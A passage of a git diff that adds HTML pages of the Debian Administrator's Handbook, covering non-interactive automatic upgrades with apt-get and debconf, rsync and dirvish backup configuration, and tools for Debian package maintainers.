diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.automatic-upgrades.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.automatic-upgrades.html
new file mode 100644
index 000000000..adfe3af3c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.automatic-upgrades.html
@@ -0,0 +1,187 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.8. Automatic Upgrades</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="sect.regular-upgrades.html"
+        title="6.7. Keeping a System Up to Date" /><link
+        rel="next"
+        href="sect.searching-packages.html"
+        title="6.9. Searching for Packages" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.automatic-upgrades.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.regular-upgrades.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.searching-packages.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.automatic-upgrades"></a>6.8. Automatic Upgrades</h2></div></div></div><a
+          id="id-1.9.17.2"
+          class="indexterm"></a><a
+          id="id-1.9.17.3"
+          class="indexterm"></a><div
+          class="para">
+			Since Falcot Corp has many computers but only limited manpower, its administrators try to make upgrades as automatic as possible. The programs in charge of these processes must therefore run with no human intervention.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.5"></a>6.8.1. Configuring <code
+                    class="command">dpkg</code></h3></div></div></div><div
+            class="para">
+				As we have already mentioned (see sidebar <a
+              class="xref"
+              href="sect.package-meta-information.html#sidebar.questions-conffiles"><span
+                class="emphasis"><em>GOING FURTHER</em></span> Avoiding the configuration file questions</a>), <code
+              class="command">dpkg</code> can be instructed not to ask for confirmation when replacing a configuration file (with the <code
+              class="literal">--force-confdef --force-confold</code> options). Interactions can, however, have three other sources: some come from APT itself, some are handled by <code
+              class="command">debconf</code>, and some happen on the command line due to package configuration scripts.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.6"></a>6.8.2. Configuring APT</h3></div></div></div><div
+            class="para">
+				The case of APT is simple: the <code
+              class="literal">-y</code> option (or <code
+              class="literal">--assume-yes</code>) tells APT to consider the answer to all its questions to be “yes”.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.7"></a>6.8.3. Configuring <code
+                    class="command">debconf</code></h3></div></div></div><div
+            class="para">
+				The case of <code
+              class="command">debconf</code> deserves more details. This program was, from its inception, designed to control the relevance and volume of questions displayed to the user, as well as the way they are shown. That is why its configuration requests a minimal priority for questions; only questions above the minimal priority are displayed. <code
+              class="command">debconf</code> assumes the default answer (defined by the package maintainer) for questions which it decided to skip.
+			</div><div
+            class="para">
+				The other relevant configuration element is the interface used by the front-end. If you choose <code
+              class="literal">noninteractive</code> out of the choices, all user interaction is disabled. If a package tries to display an informative note, it will be sent to the administrator by email.
+			</div><div
+            class="para">
+				To reconfigure <code
+              class="command">debconf</code>, use the <code
+              class="command">dpkg-reconfigure</code> tool from the <span
+              class="pkg pkg">debconf</span> package; the relevant command is <code
+              class="command">dpkg-reconfigure debconf</code>. Note that the configured values can be temporarily overridden with environment variables when needed (for instance, <code
+              class="varname">DEBIAN_FRONTEND</code> controls the interface, as documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">debconf</span>(7)</span> manual page).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.8"></a>6.8.4. Handling Command Line Interactions</h3></div></div></div><div
+            class="para">
+				The last source of interactions, and the hardest to get rid of, is the configuration scripts run by <code
+              class="command">dpkg</code>. There is unfortunately no standard solution, and no answer is overwhelmingly better than another.
+			</div><div
+            class="para">
+				The common approach is to suppress the standard input by redirecting the empty content of <code
+              class="filename">/dev/null</code> into it with <code
+              class="command"><em
+                class="replaceable">command</em> &lt;/dev/null</code>, or to feed it with an endless stream of newlines. None of these methods is 100 % reliable, but they generally lead to the default answers being used, since most scripts consider a lack of reply as an acceptance of the default value.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.17.9"></a>6.8.5. The Miracle Combination</h3></div></div></div><div
+            class="para">
+				By combining the previous elements, it is possible to design a small but rather reliable script which can handle automatic upgrades.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.non-interactive-upgrade"></a><p
+              class="title"><strong>Příklad 6.4. Non-interactive upgrade script</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">export DEBIAN_FRONTEND=noninteractive
+yes '' | apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" dist-upgrade
+</pre></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> The Falcot Corp case</strong></p></div></div></div><div
+              class="para">
+				Falcot computers are a heterogeneous system, with machines having various functions. Administrators will therefore pick the most relevant solution for each computer.
+			</div><div
+              class="para">
+				In practice, the servers running <span
+                class="distribution distribution">Stretch</span> are configured with the “miracle combination” above, and are kept up to date automatically. Only the most critical servers (the firewalls, for instances) are set up with <code
+                class="command">apticron</code>, so that upgrades always happen under the supervision of an administrator.
+			</div><div
+              class="para">
+				The office workstations in the administrative services also run <span
+                class="distribution distribution">Stretch</span>, but they are equipped with <span
+                class="pkg pkg">gnome-packagekit</span>, so that users trigger the upgrades themselves. The rationale for this decision is that if upgrades happen without an explicit action, the behavior of the computer might change unexpectedly, which could cause confusion for the main users.
+			</div><div
+              class="para">
+				In the lab, the few computers using <span
+                class="distribution distribution">Testing</span> — to take advantage of the latest software versions — are not upgraded automatically either. Administrators only configure APT to prepare the upgrades but not enact them; when they decide to upgrade (manually), the tedious parts of refreshing package lists and downloading packages will be avoided, and administrators can focus on the really useful part.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.regular-upgrades.html"><strong>Předcházející</strong>6.7. Keeping a System Up to Date</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.searching-packages.html"><strong>Další</strong>6.9. Searching for Packages</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.backup.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.backup.html
new file mode 100644
index 000000000..5860da679
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.backup.html
@@ -0,0 +1,297 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.10. Backup</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.quotas.html"
+        title="9.9. Quotas" /><link
+        rel="next"
+        href="sect.hotplug.html"
+        title="9.11. Hot Plugging: hotplug" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.backup.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quotas.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hotplug.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.backup"></a>9.10. Backup</h2></div></div></div><div
+          class="para">
+			Making backups is one of the main responsibilities of any administrator, but it is a complex subject, involving powerful tools which are often difficult to master.
+		</div><a
+          id="id-1.12.13.3"
+          class="indexterm"></a><a
+          id="id-1.12.13.4"
+          class="indexterm"></a><div
+          class="para">
+			Many programs exist, such as <code
+            class="command">amanda</code>, <code
+            class="command">bacula</code>, <code
+            class="command">BackupPC</code>. Those are client/server system featuring many options, whose configuration is rather difficult. Some of them provide user-friendly web interfaces to mitigate this. But Debian contains dozens of other backup software covering all possible use cases, as you can easily confirm with <code
+            class="command">apt-cache search backup</code>.
+		</div><a
+          id="id-1.12.13.6"
+          class="indexterm"></a><a
+          id="id-1.12.13.7"
+          class="indexterm"></a><a
+          id="id-1.12.13.8"
+          class="indexterm"></a><div
+          class="para">
+			Rather than detailing some of them, this section will present the thoughts of the Falcot Corp administrators when they defined their backup strategy.
+		</div><div
+          class="para">
+			At Falcot Corp, backups have two goals: recovering erroneously deleted files, and quickly restoring any computer (server or desktop) whose hard drive has failed.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.13.11"></a>9.10.1. Backing Up with <code
+                    class="command">rsync</code></h3></div></div></div><div
+            class="para">
+				Backups on tape having been deemed too slow and costly, data will be backed up on hard drives on a dedicated server, on which the use of software RAID (see <a
+              class="xref"
+              href="advanced-administration.html#sect.raid-soft">12.1.1 – „Software RAID“</a>) will protect the data from hard drive failure. Desktop computers are not backed up individually, but users are advised that their personal account on their department's file server will be backed up. The <code
+              class="command">rsync</code> command (from the package of the same name) is used daily to back up these different servers.
+			</div><a
+            id="id-1.12.13.11.3"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> The hard link, a second name for the file</strong></p></div></div></div><a
+              id="id-1.12.13.11.4.2"
+              class="indexterm"></a><a
+              id="id-1.12.13.11.4.3"
+              class="indexterm"></a><div
+              class="para">
+				A hard link, as opposed to a symbolic link, cannot be differentiated from the linked file. Creating a hard link is essentially the same as giving an existing file a second name. This is why the deletion of a hard link only removes one of the names associated with the file. As long as another name is still assigned to the file, the data therein remain present on the filesystem. It is interesting to note that, unlike a copy, the hard link does not take up additional space on the hard drive.
+			</div><div
+              class="para">
+				A hard link is created with the <code
+                class="command">ln <em
+                  class="replaceable">target</em> <em
+                  class="replaceable">link</em></code> command. The <em
+                class="replaceable">link</em> file is then a new name for the <em
+                class="replaceable">target</em> file. Hard links can only be created on the same filesystem, while symbolic links are not subject to this limitation.
+			</div></div><div
+            class="para">
+				The available hard drive space prohibits implementation of a complete daily backup. As such, the <code
+              class="command">rsync</code> command is preceded by a duplication of the content of the previous backup with hard links, which prevents usage of too much hard drive space. The <code
+              class="command">rsync</code> process then only replaces files that have been modified since the last backup. With this mechanism a great number of backups can be kept in a small amount of space. Since all backups are immediately available and accessible (for example, in different directories of a given share on the network), you can quickly make comparisons between two given dates.
+			</div><a
+            id="id-1.12.13.11.6"
+            class="indexterm"></a><a
+            id="id-1.12.13.11.7"
+            class="indexterm"></a><a
+            id="id-1.12.13.11.8"
+            class="indexterm"></a><div
+            class="para">
+				This backup mechanism is easily implemented with the <code
+              class="command">dirvish</code> program. It uses a backup storage space (“bank” in its vocabulary) in which it places timestamped copies of sets of backup files (these sets are called “vaults” in the dirvish documentation).
+			</div><div
+            class="para">
+				The main configuration is in the <code
+              class="filename">/etc/dirvish/master.conf</code> file. It defines the location of the backup storage space, the list of “vaults” to manage, and default values for expiration of the backups. The rest of the configuration is located in the <code
+              class="filename"><em
+                class="replaceable">bank</em>/<em
+                class="replaceable">vault</em>/dirvish/default.conf</code> files and contains the specific configuration for the corresponding set of files.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.dirvish-master"></a><p
+              class="title"><strong>Příklad 9.3. The <code
+                  class="filename">/etc/dirvish/master.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">bank:
+    /backup
+exclude:
+    lost+found/
+    core
+    *~
+Runall:
+    root    22:00
+expire-default: +15 days
+expire-rule:
+#   MIN HR    DOM MON       DOW  STRFTIME_FMT
+    *   *     *   *         1    +3 months
+    *   *     1-7 *         1    +1 year
+    *   *     1-7 1,4,7,10  1
+</pre></div></div><div
+            class="para">
+				The <code
+              class="literal">bank</code> setting indicates the directory in which the backups are stored. The <code
+              class="literal">exclude</code> setting allows you to indicate files (or file types) to exclude from the backup. The <code
+              class="literal">Runall</code> is a list of file sets to backup with a time-stamp for each set, which allows you to assign the correct date to the copy, in case the backup is not triggered at precisely the assigned time. You have to indicate a time just before the actual execution time (which is, by default, 10:04 pm in Debian, according to <code
+              class="filename">/etc/cron.d/dirvish</code>). Finally, the <code
+              class="literal">expire-default</code> and <code
+              class="literal">expire-rule</code> settings define the expiration policy for backups. The above example keeps forever backups that are generated on the first Sunday of each quarter, deletes after one year those from the first Sunday of each month, and after 3 months those from other Sundays. Other daily backups are kept for 15 days. The order of the rules does matter, Dirvish uses the last matching rule, or the <code
+              class="literal">expire-default</code> one if no other <code
+              class="literal">expire-rule</code> matches.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Scheduled expiration</strong></p></div></div></div><div
+              class="para">
+				The expiration rules are not used by <code
+                class="command">dirvish-expire</code> to do its job. In reality, the expiration rules are applied when creating a new backup copy to define the expiration date associated with that copy. <code
+                class="command">dirvish-expire</code> simply peruses the stored copies and deletes those for which the expiration date has passed.
+			</div></div><div
+            class="example"><a
+              xmlns=""
+              id="example.dirvish-vault"></a><p
+              class="title"><strong>Příklad 9.4. The <code
+                  class="filename">/backup/root/dirvish/default.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">client: rivendell.falcot.com
+tree: /
+xdev: 1
+index: gzip
+image-default: %Y%m%d
+exclude:
+    /var/cache/apt/archives/*.deb
+    /var/cache/man/**
+    /tmp/**
+    /var/tmp/**
+    *.bak
+</pre></div></div><div
+            class="para">
+				The above example specifies the set of files to back up: these are files on the machine <span
+              class="emphasis"><em>rivendell.falcot.com</em></span> (for local data backup, simply specify the name of the local machine as indicated by <code
+              class="command">hostname</code>), especially those in the root tree (<code
+              class="literal">tree: /</code>), except those listed in <code
+              class="literal">exclude</code>. The backup will be limited to the contents of one filesystem (<code
+              class="literal">xdev: 1</code>). It will not include files from other mount points. An index of saved files will be generated (<code
+              class="literal">index: gzip</code>), and the image will be named according to the current date (<code
+              class="literal">image-default: %Y%m%d</code>).
+			</div><div
+            class="para">
+				There are many options available, all documented in the <span
+              class="citerefentry"><span
+                class="refentrytitle">dirvish.conf</span>(5)</span> manual page. Once these configuration files are setup, you have to initialize each file set with the <code
+              class="command">dirvish --vault <em
+                class="replaceable">vault</em> --init</code> command. From there on the daily invocation of <code
+              class="command">dirvish-runall</code> will automatically create a new backup copy just after having deleted those that expired.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Remote backup over SSH</strong></p></div></div></div><div
+              class="para">
+				When dirvish needs to save data to a remote machine, it will use <code
+                class="command">ssh</code> to connect to it, and will start <code
+                class="command">rsync</code> as a server. This requires the root user to be able to automatically connect to it. The use of an SSH authentication key allows precisely that (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.ssh-key-based-auth">9.2.1.1 – „Key-Based Authentication“</a>).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.13.12"></a>9.10.2. Restoring Machines without Backups</h3></div></div></div><div
+            class="para">
+				Desktop computers, which are not backed up, will be easy to reinstall from custom DVD-ROMs prepared with <span
+              class="emphasis"><em>Simple-CDD</em></span> (see <a
+              class="xref"
+              href="sect.automated-installation.html#sect.simple-cdd">12.3.3 – „Simple-CDD: The All-In-One Solution“</a>). Since this performs an installation from scratch, it loses any customization that can have been made after the initial installation. This is fine since the systems are all hooked to a central LDAP directory for accounts and most desktop applications are preconfigured thanks to dconf (see <a
+              class="xref"
+              href="sect.graphical-desktops.html#sect.gnome-desktop">13.3.1 – „GNOME“</a> for more information about this).
+			</div><div
+            class="para">
+				The Falcot Corp administrators are aware of the limits in their backup policy. Since they can't protect the backup server as well as a tape in a fireproof safe, they have installed it in a separate room so that a disaster such as a fire in the server room won't destroy backups along with everything else. Furthermore, they do an incremental backup on DVD-ROM once per week — only files that have been modified since the last backup are included.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Backing up SQL and LDAP services</strong></p></div></div></div><div
+              class="para">
+				Many services (such as SQL or LDAP databases) cannot be backed up by simply copying their files (unless they are properly interrupted during creation of the backups, which is frequently problematic, since they are intended to be available at all times). As such, it is necessary to use an “export” mechanism to create a “data dump” that can be safely backed up. These are often quite large, but they compress well. To reduce the storage space required, you will only store a complete text file per week, and a <code
+                class="command">diff</code> each day, which is created with a command of the type <code
+                class="command">diff <em
+                  class="replaceable">file_from_yesterday</em> <em
+                  class="replaceable">file_from_today</em></code>. The <code
+                class="command">xdelta</code> program produces incremental differences from binary dumps.
+			</div><a
+              id="id-1.12.13.12.4.3"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.4.4"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.4.5"
+              class="indexterm"></a></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> <span
+                        class="emphasis"><em>TAR</em></span>, the standard for tape backups</strong></p></div></div></div><a
+              id="id-1.12.13.12.5.2"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.5.3"
+              class="indexterm"></a><a
+              id="id-1.12.13.12.5.4"
+              class="indexterm"></a><div
+              class="para">
+				Historically, the simplest means of making a backup on Unix was to store a <span
+                class="emphasis"><em>TAR</em></span> archive on a tape. The <code
+                class="command">tar</code> command even got its name from “Tape ARchive”.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.quotas.html"><strong>Předcházející</strong>9.9. Quotas</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.hotplug.html"><strong>Další</strong>9.11. Hot Plugging: hotplug</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.becoming-package-maintainer.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.becoming-package-maintainer.html
new file mode 100644
index 000000000..d8b12262f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.becoming-package-maintainer.html
@@ -0,0 +1,386 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">15.4. Becoming a Package Maintainer</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="prev"
+        href="sect.setup-apt-package-repository.html"
+        title="15.3. Creating a Package Repository for APT" /><link
+        rel="next"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.becoming-package-maintainer.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.setup-apt-package-repository.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="conclusion.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.becoming-package-maintainer"></a>15.4. Becoming a Package Maintainer</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.18.7.2"></a>15.4.1. Learning to Make Packages</h3></div></div></div><div
+            class="para">
+				Creating a quality Debian package is not always a simple task, and becoming a package maintainer takes some learning, both with theory and practice. It's not a simple matter of building and installing software; rather, the bulk of the complexity comes from understanding the problems and conflicts, and more generally the interactions, with the myriad of other packages available.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.2.3"></a>15.4.1.1. Rules</h4></div></div></div><div
+              class="para">
+					A Debian package must comply with the precise rules compiled in the Debian policy, and each package maintainer must know them. There is no requirement to know them by heart, but rather to know they exist and to refer to them whenever a choice presents a non-trivial alternative. Every Debian maintainer has made mistakes by not knowing about a rule, but this is not a huge problem as long as the error gets fixed when a user reports it as a bug report (which tends to happen fairly soon thanks to advanced users). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/debian-policy/">https://www.debian.org/doc/debian-policy/</a></div>
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.2.4"></a>15.4.1.2. Procedures</h4></div></div></div><a
+              id="id-1.18.7.2.4.2"
+              class="indexterm"></a><div
+              class="para">
+					Debian is not a simple collection of individual packages. Everyone's packaging work is part of a collective project; being a Debian developer involves knowing how the Debian project operates as a whole. Every developer will, sooner or later, interact with others. The Debian Developer's Reference (in the <span
+                class="pkg pkg">developers-reference</span> package) summarizes what every developer must know in order to interact as smoothly as possible with the various teams within the project, and to take the best possible advantages of the available resources. This document also enumerates a number of duties a developer is expected to fulfill. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/manuals/developers-reference/">https://www.debian.org/doc/manuals/developers-reference/</a></div>
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.7.2.5"></a>15.4.1.3. Tools</h4></div></div></div><div
+              class="para">
+					Many tools help package maintainers in their work. This section describes them quickly, but does not give the full details, since they all have comprehensive documentation of their own.
+				</div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.3"></a>15.4.1.3.1. The <code
+                        class="command">lintian</code> Program</h5></div></div></div><a
+                id="id-1.18.7.2.5.3.2"
+                class="indexterm"></a><div
+                class="para">
+						This tool is one of the most important: it's the Debian package checker. It is based on a large array of tests created from the Debian policy, and detects quickly and automatically many errors that can then be fixed before packages are released.
+					</div><div
+                class="para">
+						This tool is only a helper, and it sometimes gets it wrong (for instance, since the Debian policy changes over time, <code
+                  class="command">lintian</code> is sometimes outdated). It is also not exhaustive: not getting any Lintian error should not be interpreted as a proof that the package is perfect; at most, it avoids the most common errors.
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.4"></a>15.4.1.3.2. The <code
+                        class="command">piuparts</code> Program</h5></div></div></div><a
+                id="id-1.18.7.2.5.4.2"
+                class="indexterm"></a><div
+                class="para">
+						This is another important tool: it automates the installation, upgrade, removal and purge of a package (in an isolated environment), and checks that none of these operations leads to an error. It can help in detecting missing dependencies, and it also detects when files are incorrectly left over after the package got purged.
+					</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.18.7.2.5.5"></a>15.4.1.3.3. devscripts</h5></div></div></div><a
+                id="id-1.18.7.2.5.5.2"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.3"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.4"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.5"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.6"
+                class="indexterm"></a><a
+                id="id-1.18.7.2.5.5.7"
+                class="indexterm"></a><div
+                class="para">
+						The <span
+                  class="pkg pkg">devscripts</span> package contains many programs helping with a wide array of a Debian developer's job:
+					</div><div
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="itemizedlist"><ul><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debuild</code> allows generating a package (with <code
+                        class="command">dpkg-buildpackage</code>) and running <code
+                        class="command">lintian</code> to check its compliance with the Debian policy afterwards.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debclean</code> cleans a source package after a binary package has been generated.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">dch</code> allows quick and easy editing of a <code
+                        class="filename">debian/changelog</code> file in a source package.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">uscan</code> checks whether a new version of a software has been released by the upstream author; this requires a <code
+                        class="filename">debian/watch</code> file with a description of the location of such releases.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">debi</code> allows installing (with <code
+                        class="command">dpkg -i</code>) the Debian package that was just generated without the need to type its full name and path.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								In a similar fashion, <code
+                        class="command">debc</code> allows scanning the contents of the recently-generated package (with <code
+                        class="command">dpkg -c</code>), without needing to type its full name and path.
+							</div></li><li
+                    class="listitem"><div
+                      class="para">
+								<code
+                        class="command">bts</code> controls the bug tracking system from the command line; this program automatically generates the appropriate emails.
